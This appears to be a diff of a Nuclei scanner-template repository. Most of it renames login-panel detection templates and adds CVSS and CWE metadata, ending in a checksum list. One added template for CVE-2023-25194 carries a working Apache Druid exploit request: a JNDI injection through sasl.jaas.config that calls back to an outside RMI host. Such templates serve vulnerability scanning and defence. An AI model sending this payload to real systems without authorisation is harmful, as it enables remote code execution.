cwe-id: CWE-200
metadata:
max-request: 1
verified: "true"
@ -26,3 +30,5 @@ http:
- type: status
status:
- 200
# Enhanced by md on 2023/04/20

View File

@ -1,13 +1,17 @@
id: axway-securetransport-panel
info:
name: AXWAY Secure Transport Panel - Detect
name: Axway SecureTransport Login Panel - Detect
author: righettod
severity: info
description: |
AXWAY SecureTransport login panel was detected.
reference:
- https://www.axway.com/en/products/managed-file-transfer/securetransport
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
max-request: 1
verified: "true"
@ -42,3 +46,5 @@ http:
group: 1
regex:
- '"SecureTransport", "([0-9.]+)",'
# Enhanced by md on 2023/04/25

View File

@ -1,16 +1,20 @@
id: axway-securetransport-webclient
info:
name: AXWAY Secure Transport Web Client Panel - Detect
name: Axway SecureTransport Web Client Panel - Detect
author: righettod
severity: info
description: AXWAY Secure Transport Web Client panel was detected.
reference:
- https://www.axway.com/en/products/managed-file-transfer/securetransport
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
max-request: 1
verified: true
google-dork: intitle:"ST Web Client"
google-query: intitle:"ST Web Client"
tags: panel,axway,securetransport,webclient
http:
@ -28,3 +32,5 @@ http:
- type: status
status:
- 200
# Enhanced by md on 2023/04/25

View File

@ -1,9 +1,14 @@
id: caton-network-manager-system
info:
name: Caton Network Manager System
name: Caton Network Manager System Login Panel - Detect
author: pussycat0x
severity: info
description: Caton Network Manager System login panel was detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
max-request: 1
verified: "true"
@ -25,3 +30,5 @@ http:
- type: status
status:
- 200
# Enhanced by md on 2023/04/25

View File

@ -30,3 +30,5 @@ http:
part: body
words:
- '<a id=\"poweredby\" href=\"http:\/\/craftcms.com\/\"'
# Enhanced by md on 2023/04/25

View File

@ -5,7 +5,11 @@ info:
author: ja1sh
severity: info
description: |
Dynatrace | Simplify cloud complexity and innovate faster and more efficiently with observability, security, and AIOps in one platform.
Dynatrace login panel was detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
max-request: 1
verified: "true"
@ -27,3 +31,5 @@ http:
- type: status
status:
- 200
# Enhanced by md on 2023/04/25

View File

@ -1,9 +1,14 @@
id: dzzoffice-install
info:
name: DzzOffice Exposed Installation
name: DzzOffice Installation Panel - Detect
author: ritikchaddha
severity: high
description: DzzOffice installation panel was detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-200
metadata:
max-request: 1
verified: true
@ -33,3 +38,5 @@ http:
- type: status
status:
- 200
# Enhanced by md on 2023/04/25

View File

@ -1,9 +1,14 @@
id: elemiz-network-manager
info:
name: Elemiz Network Manager
name: Elemiz Network Manager Login Panel - Detect
author: pussycat0x
severity: info
description: Elemiz Network Manager login panel was detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
max-request: 1
verified: "true"
@ -25,3 +30,5 @@ http:
- type: status
status:
- 200
# Enhanced by md on 2023/04/25

View File

@ -1,9 +1,14 @@
id: ewm-manager-panel
info:
name: EWM Manager Panel
name: EWM Manager Login Panel - Detect
author: pussycat0x
severity: info
description: EWM Manager login panel was detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
max-request: 1
verified: true
@ -31,3 +36,5 @@ http:
part: body
regex:
- "EWM Manager ([0-9.]+)"
# Enhanced by md on 2023/04/25

View File

@ -1,9 +1,14 @@
id: exagrid-manager-panel
info:
name: ExaGrid Manager Panel
name: ExaGrid Manager Login Panel - Detect
author: pussycat0x
severity: info
description: ExaGrid Manager login panel was detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
max-request: 1
verified: true
@ -32,3 +37,5 @@ http:
- type: status
status:
- 200
# Enhanced by md on 2023/04/25

View File

@ -1,12 +1,19 @@
id: fatpipe-mpvpn-panel
info:
name: FatPipe MPVPN Panel Detect
name: FatPipe MPVPN - Panel Detect
author: princechaddha
severity: info
tags: tech,fatpipe
description: The admin panel of the FatPipe MPVPN has been discovered.
reference:
- https://www.fatpipeinc.com/products/mpvpn/index.php
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
max-request: 1
tags: tech,fatpipe,panel
http:
- method: GET
@ -31,3 +38,5 @@ http:
group: 1
regex:
- '<h5>([0-9.a-z]+)<\/h5>'
# Enhanced by cs 04/25/2023

View File

@ -1,12 +1,19 @@
id: fatpipe-warp-panel
info:
name: FatPipe WARP Panel Detect
name: FatPipe WARP - Panel Detect
author: princechaddha
severity: info
tags: tech,fatpipe
description: the FatPipe WARP administration panel was discovered.
reference:
- https://www.fatpipeinc.com/products/warp/index.php
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
max-request: 1
tags: tech,fatpipe,panel
http:
- method: GET
@ -31,3 +38,5 @@ http:
group: 1
regex:
- '<h5>([0-9.a-z]+)<\/h5>'
# Enhanced by cs 04/25/20223

View File

@ -5,7 +5,7 @@ info:
author: johnk3r
severity: info
description: |
FortiManager enables centralized management with automation-driven network configuration, visibility, and security policy management.
Fortinet FortiManager panel was detected.
reference:
- https://www.fortinet.com/br/products/management/fortimanager
classification:
@ -38,3 +38,5 @@ http:
group: 1
regex:
- '<span class="platform">(.*?)</span>'
# Enhanced by md on 2023/04/25

View File

@ -1,9 +1,14 @@
id: fortinet-fortinac-panel
info:
name: Fortinet FortiNAC Panel
name: Fortinet FortiNAC Login Panel - Detect
author: johnk3r
severity: info
description: Fortinet FortiNAC login panel was detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
max-request: 1
verified: "true"
@ -33,3 +38,5 @@ http:
part: body
regex:
- '"version":"([0-9.]+)"'
# Enhanced by md on 2023/04/25

View File

@ -1,9 +1,14 @@
id: freeipa-panel
info:
name: FreeIPA Identity Management Panel - Detect
name: FreeIPA Identity Management Login Panel - Detect
author: DhiyaneshDk
severity: info
description: FreeIPA Identity Management login panel was detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
max-request: 2
verified: "true"
@ -28,3 +33,5 @@ http:
- type: status
status:
- 200
# Enhanced by md on 2023/04/25

View File

@ -1,11 +1,15 @@
id: gnu-mailman
info:
name: Exposed GNU Mailman - Detect
name: GNU Mailman Panel - Detect
author: Matt Galligan
severity: info
description: |
Lists of all the public mailing.
GNU Mailman panel was detected. Panel exposes all public mailing lists on server.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
max-request: 2
verified: "true"
@ -32,3 +36,5 @@ http:
- type: status
status:
- 200
# Enhanced by md on 2023/04/25

View File

@ -1,11 +1,16 @@
id: group-ib-panel
info:
name: Group-IB Managed XDR Panel
name: Group-IB Managed XDR Login Panel - Detect
author: DhiyaneshDK
severity: info
description: Group-IB Managed XDR login panel was detected.
reference:
- https://www.facebook.com/photo/?fbid=566951735475350&set=a.467014098802448
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
max-request: 1
verified: "true"
@ -27,3 +32,5 @@ http:
- type: status
status:
- 200
# Enhanced by md on 2023/04/25

View File

@ -1,11 +1,14 @@
id: gryphon-login
info:
name: Gryphon Panel
name: Gryphon Panel - Detect
author: pdteam
severity: info
reference:
- https://gryphonconnect.com/software-release-updates/
description: Gryphon router panel was detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
max-request: 1
shodan-query: http.title:"Gryphon"
@ -23,3 +26,5 @@ http:
- 'Gryphon'
- 'Welcome to GryphonCare'
condition: or
# Enhanced by md on 2023/04/25

View File

@ -1,10 +1,14 @@
id: hashicorp-consul-agent
info:
name: Hashicorp Consul Agent Detection
name: Hashicorp Consul Agent - Detect
author: c-sh0
severity: info
description: Obtain Consul Version Information
description: Hashicorp Consul Agent was detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: tech,consul,api
metadata:
max-request: 1
@ -26,3 +30,5 @@ http:
- type: json
json:
- " .Config.Version"
# Enhanced by md on 2023/04/25

View File

@ -1,11 +1,16 @@
id: hestia-panel
info:
name: Hestia Control Panel - Detect
name: Hestia Control Panel Login - Detect
author: JustaAcat
severity: info
description: Hestia Control Panel login was detected.
reference:
- https://hestiacp.com/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
max-request: 1
verified: "true"
@ -29,3 +34,5 @@ http:
- type: status
status:
- 200
# Enhanced by md on 2023/04/25

View File

@ -1,11 +1,16 @@
id: i-mscp-panel
info:
name: i-MSCP - Multi Server Control Panel - Detect
name: Internet Multi Server Control Panel - Detect
author: JustaAcat
severity: info
description: Internet Multi Server Control Panel was detected.
reference:
- https://i-mscp.net/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
max-request: 1
verified: "true"
@ -26,3 +31,5 @@ http:
- type: status
status:
- 200
# Enhanced by md on 2023/04/25

View File

@ -1,11 +1,16 @@
id: jboss-jbpm-admin
info:
name: JBoss jBPM Admin Console - Detect
name: JBoss jBPM Administration Console Login Panel - Detect
author: DhiyaneshDK
severity: info
description: JBoss jBPM Administration Console login panel was detected.
reference:
- https://github.com/PortSwigger/j2ee-scan/blob/master/src/main/java/burp/j2ee/issues/impl/JBossjBPMAdminConsole.java
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
max-request: 1
verified: "true"
@ -27,3 +32,5 @@ http:
- type: status
status:
- 200
# Enhanced by md on 2023/04/25

View File

@ -1,9 +1,14 @@
id: jboss-soa-platform
info:
name: JBoss SOA Platform Panel - Detect
name: JBoss SOA Platform Login Panel - Detect
author: ritikchaddha
severity: info
description: JBoss SOA Platform login panel was detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
max-request: 1
verified: true
@ -25,3 +30,5 @@ http:
- type: status
status:
- 200
# Enhanced by md on 2023/04/25

View File

@ -1,13 +1,20 @@
id: kenesto-login
info:
name: Kenesto Login Detect
name: Kenesto - Login Detect
author: pussycat0x
severity: info
description: Kenesto login panel was discovered.
metadata:
max-request: 1
fofa-query: 'app="kenesto"'
tags: login,tech,kenesto
tags: login,tech,kenesto,panel
reference:
- https://www.kenesto.com/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
http:
- method: GET
@ -25,3 +32,5 @@ http:
- type: status
status:
- 200
# Enhanced by cs 04/25/2023

View File

@ -1,11 +1,16 @@
id: konga-panel
info:
name: Konga Panel Detect
name: Konga Panel - Detect
author: princechaddha
severity: info
description: Konga panel was detected.
reference:
- https://github.com/pantsel/konga
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: tech,konga,oss
metadata:
max-request: 1
@ -32,3 +37,5 @@ http:
group: 1
regex:
- 'konga_version = "(.*)";'
# Enhanced by md on 2023/04/25

View File

@ -1,9 +1,14 @@
id: kraken-cluster-monitoring
info:
name: Kraken Cluster Monitoring - Detect
name: Kraken Cluster Monitoring Dashboard - Detect
author: pussycat0x
severity: info
description: Kraken Cluster Monitoring Dashboard was detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
max-request: 1
verified: true
@ -26,3 +31,5 @@ http:
- type: status
status:
- 200
# Enhanced by md on 2023/04/25

View File

@ -1,9 +1,14 @@
id: kubernetes-enterprise-manager
info:
name: Detect Kubernetes Enterprise Manager
name: Kubernetes Enterprise Manager Panel - Detect
author: pussycat0x
severity: info
description: Kubernetes Enterprise Manager panel was detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
max-request: 1
fofa-query: app="Kubernetes-Enterprise-Manager"
@ -24,3 +29,5 @@ http:
- type: status
status:
- 200
# Enhanced by md on 2023/04/25

View File

@ -1,9 +1,14 @@
id: kubernetes-mirantis
info:
name: Mirantis Kubernetes Engine
name: Mirantis Kubernetes Engine Panel - Detect
author: pussycat0x
severity: info
description: Mirantis Kubernetes Engine panel was detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
max-request: 1
verified: true
@ -26,3 +31,5 @@ http:
- type: status
status:
- 200
# Enhanced by md on 2023/04/25

View File

@ -1,13 +1,17 @@
id: magnolia-panel
info:
name: Magnolia Panel - Detect
name: Magnolia CMS Login Panel - Detect
author: pussycat0x
severity: info
description: |
Magnolia CMS is a powerful and versatile content management system that provides users with a host of features and options for web development. It offers a wide range of capabilities to help create a website that is both attractive and effective.
Magnolia CMS login panel was detected.
reference:
- https://www.magnolia-cms.com/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
max-request: 2
verified: "true"
@ -32,3 +36,5 @@ http:
part: header
words:
- "text/html"
# Enhanced by md on 2023/04/25

View File

@ -1,13 +1,16 @@
id: mautic-crm-panel
info:
name: Mautic CRM Panel Login
name: Mautic CRM Login Panel - Detect
author: cyllective,daffainfo
severity: info
description: Mautic is a free and open-source marketing automation tool for Content Management, Social Media, Email Marketing, and can be used for the integration of social networks, campaign management, forms,
questionnaires, reports, etc.
description: Mautic CRM login panel was detected.
reference:
- https://github.com/mautic/mautic
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: tech,mautic,crm
metadata:
max-request: 1
@ -29,3 +32,5 @@ http:
- type: status
status:
- 200
# Enhanced by md on 2023/04/25

View File

@ -4,6 +4,11 @@ info:
name: Metasploit Setup and Configuration Page - Detect
author: ritikchaddha
severity: info
description: Metasploit setup and configuration page was detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
max-request: 1
verified: "true"
@ -21,3 +26,5 @@ http:
part: body
words:
- 'Metasploit - Setup and Configuration'
# Enhanced by md on 2023/04/25

View File

@ -1,9 +1,14 @@
id: normhost-backup-server-manager
info:
name: Normhost Backup Server Manager - Detect
name: Normhost Backup Server Manager Panel - Detect
author: pussycat0x
severity: info
description: Normhost Backup server manager panel was detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
max-request: 1
verified: true
@ -25,3 +30,5 @@ http:
- type: status
status:
- 401
# Enhanced by md on 2023/04/25

View File

@ -1,9 +1,14 @@
id: o2-easy-panel
info:
name: O2 Easy Setup Router Panel - Detect
name: O2 Router Setup Panel - Detect
author: ritikchaddha
severity: info
description: O2 router setup panel was detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
max-request: 1
verified: "true"
@ -25,3 +30,5 @@ http:
- type: status
status:
- 200
# Enhanced by md on 2023/04/25

View File

@ -1,11 +1,16 @@
id: opencpu-panel
info:
name: OpenCPU Panel
name: OpenCPU Panel - Detect
author: wa1tf0rme
severity: info
description: OpenCPU panel was detected.
reference:
- https://github.com/opencpu/opencpu/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: opencpu,oss
metadata:
max-request: 1
@ -23,3 +28,5 @@ http:
- OpenCPU Test Page
- OpenCPU API Explorer
condition: or
# Enhanced by md on 2023/04/25

View File

@ -4,6 +4,7 @@ info:
name: Opengear Management Console Login Panel - Detect
author: ffffffff0x,daffainfo
severity: info
description: The Opengear Management Console admin panel has been discovered.
reference: https://opengear.com/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
@ -34,4 +35,4 @@ http:
status:
- 200
# Enhnanced by cs 2023/01/09
# Enhanced by cs 2023/01/09

View File

@ -0,0 +1,30 @@
id: mail-archive
info:
name: The Mail Archive Information
author: lu4nx
description: Mail-archive information check was conducted.
severity: info
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: osint,osint-coding,maillist
self-contained: true
requests:
- method: GET
path:
- "https://www.mail-archive.com/search?l=all&q={{user}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<h3>No matches were found for <i></i>"
negative: true
- type: status
status:
- 200

View File

@ -0,0 +1,90 @@
id: CVE-2023-25194
info:
name: Apache Druid Kafka Connect - Remote Code Execution
author: j4vaovo
severity: high
description: |
The vulnerability has the potential to enable a remote attacker with authentication to run any code on the system. This is due to unsafe deserialization that occurs during the configuration of the connector through the Kafka Connect REST API
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-25194
- https://nvd.nist.gov/vuln/detail/CVE-2023-25194
- https://github.com/nbxiglk0/Note/blob/0ddc14ecd296df472726863aa5d1f0f29c8adcc4/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/Java/ApacheDruid/ApacheDruid%20Kafka-rce/ApacheDruid%20Kafka-rce.md#apachedruid-kafka-connect-rce
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.1
cve-id: CVE-2023-25194
cwe-id: CWE-502
metadata:
verified: "true"
shodan-query: html:"Apache Druid"
tags: cve,cve2023,apache,druid,kafka,rce,jndi,oast
requests:
- raw:
- |
POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"type":"kafka",
"spec":{
"type":"kafka",
"ioConfig":{
"type":"kafka",
"consumerProperties":{
"bootstrap.servers":"127.0.0.1:6666",
"sasl.mechanism":"SCRAM-SHA-256",
"security.protocol":"SASL_SSL",
"sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"rmi://{{interactsh-url}}:6666/test\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
},
"topic":"test",
"useEarliestOffset":true,
"inputFormat":{
"type":"regex",
"pattern":"([\\s\\S]*)",
"listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965",
"columns":[
"raw"
]
}
},
"dataSchema":{
"dataSource":"sample",
"timestampSpec":{
"column":"!!!_no_such_column_!!!",
"missingValue":"1970-01-01T00:00:00Z"
},
"dimensionsSpec":{
},
"granularitySpec":{
"rollup":false
}
},
"tuningConfig":{
"type":"kafka"
}
},
"samplerConfig":{
"numRows":500,
"timeoutMs":15000
}
}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: word
part: body
words:
- 'RecordSupplier'
- type: status
status:
- 400

View File

@ -15,7 +15,7 @@ dns/caa-fingerprint.yaml:db58ace220aea971c5019c9b82beab00bd2f5ad5
dns/cname-fingerprint.yaml:a5cf5caa268a11dc2e7b866324ea12e8b0a04646
dns/cname-service.yaml:9f8e381636907c44f06de26775a699dcd3474deb
dns/detect-dangling-cname.yaml:1c0429cd81e1b66f76a958b74a6f10fb15850e41
dns/dmarc-detect.yaml:64f72ec4aaaa6e9635854d8993d000b51e1c17bd
dns/dmarc-detect.yaml:3377ebe11b5245dfad0e9ac1735e9021e0dd419c
dns/dns-waf-detect.yaml:bf31c8fc04af36ab3027c0fad4e21391952cc5e8
dns/dnssec-detection.yaml:39ec1822c91e978d3c6ca22e8da912199aa1da37
dns/ec2-detection.yaml:a083700b8101fd278f74993d87d6569057d8ad79
@ -398,7 +398,7 @@ http/cnvd/2021/CNVD-2021-49104.yaml:1d71aa67f8ab4db9e3ebfc330181264beb014cf9
http/cnvd/2022/CNVD-2022-03672.yaml:821a14e7040536708c7a870ad72a9bd5a0911484
http/cnvd/2022/CNVD-2022-42853.yaml:57627926ae68433f4b31f4154de9a0ce0c79dd48
http/cves/2000/CVE-2000-0114.yaml:6a8c288f6f17dd3f3342d4997154de274e71f3ec
http/cves/2002/CVE-2002-1131.yaml:198d70e06393f068bbc0109146027a7ed154c23d
http/cves/2002/CVE-2002-1131.yaml:6c2de2fee718395cca993680a1d4e0c9de2885dc
http/cves/2004/CVE-2004-0519.yaml:1fdbb2036c825aeac782c857600e9554275674eb
http/cves/2005/CVE-2005-2428.yaml:550187ff87ca646627c4be146bf697eca21418e0
http/cves/2005/CVE-2005-3344.yaml:7c6ea112cba53447c2d2fc548e0a759bcaca265e
@ -547,7 +547,7 @@ http/cves/2010/CVE-2010-4769.yaml:7258771b47090f976d13fd0e253f9c7256c102a4
http/cves/2010/CVE-2010-4977.yaml:5a0a4d9647b9378b5059702b27ca22bd45227ad9
http/cves/2010/CVE-2010-5028.yaml:f15bb7ca8f7decc408401f4c47e5a035b8b650ee
http/cves/2010/CVE-2010-5278.yaml:533c3a25939564c0b828527d09dab1d306b63dee
http/cves/2010/CVE-2010-5286.yaml:fc584d07f30fc3dbe502bd3ec53ba0f7b763180c
http/cves/2010/CVE-2010-5286.yaml:318274005c16b9a4e8d681cd5d10528dd303b720
http/cves/2011/CVE-2011-0049.yaml:2847f341a44a2c219559b6e7c325f8c6cfdbd815
http/cves/2011/CVE-2011-1669.yaml:744421c6dd32e1bb39dbd49ad354e390365bfa26
http/cves/2011/CVE-2011-2744.yaml:b4430ab467dcb9636c9386e0ad947dbe5898c007
@ -568,10 +568,10 @@ http/cves/2012/CVE-2012-0394.yaml:9913c3af81e641c757290bd428598ab6acef88d2
http/cves/2012/CVE-2012-0896.yaml:fea878321eeee3bf150a3743cf6574bcb9283c2b
http/cves/2012/CVE-2012-0901.yaml:b2c013af98a8142b5e2fecc1a85fb6bcee77d638
http/cves/2012/CVE-2012-0981.yaml:97e0f0feb99e42d438828bded6b154c28a8546b6
http/cves/2012/CVE-2012-0991.yaml:c796cf4ce74e54c4c852976dfe432035d6f6f6f9
http/cves/2012/CVE-2012-0991.yaml:158046c78c09aa8185ca2f9767127257477dfbe9
http/cves/2012/CVE-2012-0996.yaml:e1e158f483877b4ab038f19444bff44b53545591
http/cves/2012/CVE-2012-1226.yaml:17049a7f68c89618ec1d71d78f216c6a14dbde2f
http/cves/2012/CVE-2012-1823.yaml:205577dc49c0fcbc1884953265fa0d320bb01f3d
http/cves/2012/CVE-2012-1823.yaml:3aab5917a9d8a8de75df12165bcb01ce66c68c0f
http/cves/2012/CVE-2012-1835.yaml:ea54b634cc1872e94978f066184427dab922c0fc
http/cves/2012/CVE-2012-2371.yaml:d51f719f0e55b3bf6da09c60b263421f06adc5f8
http/cves/2012/CVE-2012-3153.yaml:a22f605e727a1c113b69a324355165fd6d906230
@ -585,7 +585,7 @@ http/cves/2012/CVE-2012-4889.yaml:5adabdae528ed6832f4f68235a0cf2752e37e569
http/cves/2012/CVE-2012-4940.yaml:93a08260ec6348a13b8dbf1a54d18cbefb53e523
http/cves/2012/CVE-2012-5913.yaml:b69eef11830ec647a541b14cba3fc97408a30357
http/cves/2013/CVE-2013-1965.yaml:582dcf446289c86cca784566558a747dac2968cb
http/cves/2013/CVE-2013-2248.yaml:e6224c01d0a6ccf49f34e9aaecffe96e882e36cb
http/cves/2013/CVE-2013-2248.yaml:3bbf838d2506bcc98164950a596da04bb9122a5b
http/cves/2013/CVE-2013-2251.yaml:95241dd35115934217295e024761b5b77c1a69f7
http/cves/2013/CVE-2013-2287.yaml:6c2a646ddee24b5fcc9d6a4562357f7f51460586
http/cves/2013/CVE-2013-3526.yaml:6a7c7c360e82015a830baac57d02715312d3116e
@ -602,10 +602,10 @@ http/cves/2014/CVE-2014-10037.yaml:438ed57796fa41a21aac375d9affc39f528c7ce9
http/cves/2014/CVE-2014-1203.yaml:f2b2a02f3b6d2c0c92087dedf97d2344472463f5
http/cves/2014/CVE-2014-2321.yaml:5e606b25b1c61a4aa1556231a8719a590ea73b6a
http/cves/2014/CVE-2014-2323.yaml:2f57e1c78667d3707bf7315298186dc3d06ba958
http/cves/2014/CVE-2014-2383.yaml:b5ea98b77d36eba78bc1037ccb8415869e7c7281
http/cves/2014/CVE-2014-2383.yaml:f5d6a0fe0ffe9e9c80656b74532b7e4df99ef0fe
http/cves/2014/CVE-2014-2908.yaml:4b0b708d6973024e06302c104ebd4c18c26e1430
http/cves/2014/CVE-2014-2962.yaml:591d1320efbc5de098e113c76b92eba3ef9d805c
http/cves/2014/CVE-2014-3120.yaml:7bb8615d2ba4d4e859f7d1236e5f79790abe4159
http/cves/2014/CVE-2014-3120.yaml:e03fdb35c84783606c5554119b7b102df0f789e2
http/cves/2014/CVE-2014-3206.yaml:ce6fe7258f4ffeff9997ff44e0dbfcd06f08d473
http/cves/2014/CVE-2014-3704.yaml:b2ddac6ad135ec1738b4c12604e31da4f5e9f548
http/cves/2014/CVE-2014-3744.yaml:14974eb720418cf94bbb3710374e46715cc3b935
@ -619,9 +619,9 @@ http/cves/2014/CVE-2014-4550.yaml:c73de30c3ad51220b373060c6c8f97f20975818e
http/cves/2014/CVE-2014-4558.yaml:fa2a49bf494c357918fa26dce66765b1a53ff059
http/cves/2014/CVE-2014-4561.yaml:b6fd58fc066a5298454ab748cc5132135b32997b
http/cves/2014/CVE-2014-4592.yaml:3c2b9e05a62e664b082c20f6edc783db4b3a6d72
http/cves/2014/CVE-2014-4940.yaml:fa4f4ae8b32e1ffc0a035e7c6929c868cd0def50
http/cves/2014/CVE-2014-4940.yaml:fa99414ce2bda6edc018fd0d66b8187f06c8565b
http/cves/2014/CVE-2014-4942.yaml:d3580ffd54ebcfe5835069494be492b2023e32ce
http/cves/2014/CVE-2014-5111.yaml:be5e62653f197f5eebdae8d4179cb4524f2bedda
http/cves/2014/CVE-2014-5111.yaml:27f9f3ef50c3c4395c9c1b0ddaf707464d363d9d
http/cves/2014/CVE-2014-5258.yaml:331970340c2c8066814eff8af635a2632730f8fe
http/cves/2014/CVE-2014-5368.yaml:00594f828632ba50dec83ad69a3dd75a27b9b175
http/cves/2014/CVE-2014-6271.yaml:3caac83ce98c6c82ac16d58adbade09b47fa6988
@ -641,11 +641,11 @@ http/cves/2014/CVE-2014-9614.yaml:1c5e5738db439463dba1f9676ad97c1b05e524e4
http/cves/2014/CVE-2014-9615.yaml:513df9307dadf6e0250879d867f0c4a09bb15c78
http/cves/2014/CVE-2014-9617.yaml:c6ba7deeae94fd7321b2f0a6ff5ed592731efb98
http/cves/2014/CVE-2014-9618.yaml:5a88f0bbc9bec83794089caa88c61679b9dae610
http/cves/2015/CVE-2015-0554.yaml:0331a5905da50ed1c93e6c2bc34d15ab767a707b
http/cves/2015/CVE-2015-0554.yaml:5db330e35a666f1123b0086eb21c5d7953993c97
http/cves/2015/CVE-2015-1000005.yaml:e6e694ba27185c2bc2054c521a085d7a32869a8e
http/cves/2015/CVE-2015-1000010.yaml:f8bd11db8ceb2aadb09b49cec00a53457c53d595
http/cves/2015/CVE-2015-1000012.yaml:660c1d0dba56e6bedf5f34d5bc6099db7d026cbb
http/cves/2015/CVE-2015-1427.yaml:0a21e751c01b6a433f8582c9210f4c4e1095facd
http/cves/2015/CVE-2015-1427.yaml:d3adfe5ac76cb25af766aecaa52510d3e85f4530
http/cves/2015/CVE-2015-1503.yaml:12036964d0e4690c66969f285d928f49ad8f8ede
http/cves/2015/CVE-2015-1579.yaml:c8b528b52a97a15e690f84b73a51c19f93c3f645
